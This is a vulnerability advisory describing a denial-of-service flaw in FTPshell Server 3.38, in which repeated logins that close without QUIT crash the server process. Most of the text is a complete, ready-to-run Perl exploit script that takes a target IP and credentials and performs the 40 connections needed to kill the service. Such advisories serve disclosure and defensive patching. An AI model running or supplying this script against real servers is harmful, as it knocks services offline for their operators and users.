FTPshellDoS.txt

`Summary:  
Denial of service vulnerability in FTPshell Server Version 3.38  
(http://www.ftpshell.com/)  
  
Details:  
Logging into the FTP server successfully and then closing the  
connection (without using the QUIT command) 39 times will cause the  
ftpshelld.exe process will die.  
  
Vulnerable Versions:  
FTPshell Server Version 3.38  
  
Patches/Workarounds:  
The vendor was notified of the issue. A patch will be release shorly.  
The patch will be made available via the vendor's web site  
(http://www.ftpshell.com/).  
  
Exploits:  
Run the following PERL script against the server. The corresponding  
process will die.  
  
#===== Start FTPShell_FTPDOS.pl =====  
#  
# Usage: FTPShell_FTPDOS.pl <ip> <user> <pass>  
# FTPShell_FTPDOS.pl 127.0.0.1 hello moto  
#  
# FTPshell Server Version 3.38  
#  
# Download:  
# http://www.ftpshell.com/  
#  
################################################  
  
use IO::Socket;  
use Win32;  
use strict;  
  
my($i) = "";  
my($socket) = "";  
  
for ($i = 1; $i <= 40; $i++)  
{  
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],  
PeerPort => "21",  
Proto => "TCP"))  
{  
print "Login \#$i\n";  
  
Win32::Sleep(300);  
  
print $socket "USER $ARGV[1]\r\n";  
  
Win32::Sleep(100);  
  
print $socket "PASS $ARGV[2]\r\n";  
  
Win32::Sleep(100);  
  
print $socket "PORT 127,0,0,1,18,12\r\n";  
  
Win32::Sleep(100);  
  
close($socket);  
}  
else  
{  
print "Cannot connect to $ARGV[0]:21\n";  
}  
}  
#===== Start FTPShell_FTPDOS.pl =====  
  
Discovered by Reed Arvin reedarvin[at]gmail[dot]com  
(http://reedarvin.thearvins.com/)  
  
Vulnerability discovered using PeachFuzz  
(http://reedarvin.thearvins.com/tools.html)  
`